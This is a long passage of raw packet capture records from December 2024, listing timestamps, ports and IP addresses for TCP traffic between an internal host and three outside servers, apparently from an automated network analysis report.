                                                                                                                Dec 16, 2024 07:12:32.794578075 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.795388937 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.795454979 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.798428059 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.798511028 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.870434046 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870449066 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870620966 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.870652914 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.870712042 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.880234957 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.880256891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.880368948 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.880399942 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891473055 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891496897 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891535997 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.891567945 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.891586065 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.902856112 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.902874947 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.902998924 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.903000116 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.903033018 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912702084 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912733078 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912767887 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.912801981 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.912830114 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922543049 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.922560930 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.922700882 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922700882 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.922738075 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928802967 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928827047 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928859949 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.928894043 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.928916931 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935822964 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.935841084 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.935941935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935941935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.935976982 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.981317997 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063308001 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063390970 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063541889 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063541889 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.063574076 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.063633919 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.069768906 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.069792986 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.070000887 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.070034027 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.070246935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.075505972 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075525045 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075624943 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.075656891 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.075707912 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.081955910 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.081974983 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.082128048 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.082159996 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.082218885 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.088059902 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088078976 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088140965 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.088172913 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.088231087 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.094434023 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094451904 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094579935 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.094625950 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.094672918 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.100971937 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.100991011 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.101113081 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.101144075 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.101197958 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106702089 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106720924 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106822968 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106822968 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106856108 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106898069 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.255916119 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.255976915 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.256123066 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.256185055 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.256230116 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.256253004 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261584997 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261630058 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261761904 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261763096 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261826992 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261892080 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268008947 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268052101 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268167019 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268167019 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268230915 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268290043 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274441004 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274481058 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274646044 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274646044 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274709940 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274797916 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280548096 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280590057 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280729055 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280729055 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280793905 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280848026 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287017107 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287060022 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287097931 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287166119 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287206888 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287252903 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.292866945 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.292908907 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.293064117 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.293082952 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.293209076 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:38.565383911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.565427065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.565623045 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.569089890 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.569319963 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.569395065 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.572945118 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.573036909 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.573149920 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.576734066 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.576867104 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.576984882 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.580461025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.580650091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.580703020 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.584028006 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.584265947 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.584367037 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.587420940 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.587672949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.587722063 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.590657949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.590857029 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.590922117 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.593858004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.594069004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.594302893 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.597083092 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.597203016 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.597316027 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.600328922 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.600382090 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.600557089 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.602833986 CET8049741178.237.33.50192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.602889061 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:38.603487015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.603605986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.603739977 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.606698036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.606919050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.606960058 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.609899044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.610210896 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.610826015 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.613109112 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.613254070 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.614165068 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.616308928 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.616427898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.616477966 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.619520903 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.619635105 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.619677067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.622735023 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.622986078 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.623037100 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.625961065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.626218081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.626264095 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.629262924 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.629415035 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.629467964 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.632410049 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.632637978 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.632693052 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.635584116 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.635698080 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.636238098 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.638766050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.638892889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.638952971 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.642000914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.642246962 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.642415047 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.645195961 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.645303965 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.645364046 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.648452997 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.648509026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651027918 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.651639938 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651822090 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.651875019 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.654834032 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.654928923 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.655061007 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.658037901 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.658163071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.658220053 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.661257982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.661354065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.661413908 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.664375067 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743103027 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743170977 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743386030 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.743611097 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743752956 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.743793964 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.746103048 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.746210098 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.746280909 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.748007059 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.748110056 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.748112917 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750458002 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750550985 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.750611067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.752888918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.752948999 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.753015995 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.755337954 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.755429983 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.755474091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757652998 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757781982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.757987976 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.759970903 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.760034084 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.760087967 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762284994 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762403011 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.762461901 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.764509916 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.764630079 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.764808893 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.766712904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.766778946 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.766810894 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.768889904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.769015074 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.769076109 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.771071911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.771137953 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.771188021 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773267031 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773360968 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.773420095 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.775422096 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.775492907 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.775511026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777492046 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777612925 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.777672052 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.779583931 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.779680967 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.779685020 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.781642914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.781789064 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.781848907 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.783682108 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.783809900 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.783987999 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.978776932 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.978897095 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.979995012 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.980051994 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.980113983 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.980715990 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.981244087 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.981370926 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.981429100 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.982511044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.982633114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.982686043 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.983763933 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.983886957 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.983978987 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.985018015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.985133886 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.985467911 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.986269951 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.986392021 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.986443996 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.987539053 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.987646103 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.988415956 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.988778114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.988898039 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.990039110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.990093946 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.990156889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991276026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991374969 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.991813898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991871119 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.992811918 CET1464649740107.173.143.31192.168.2.4
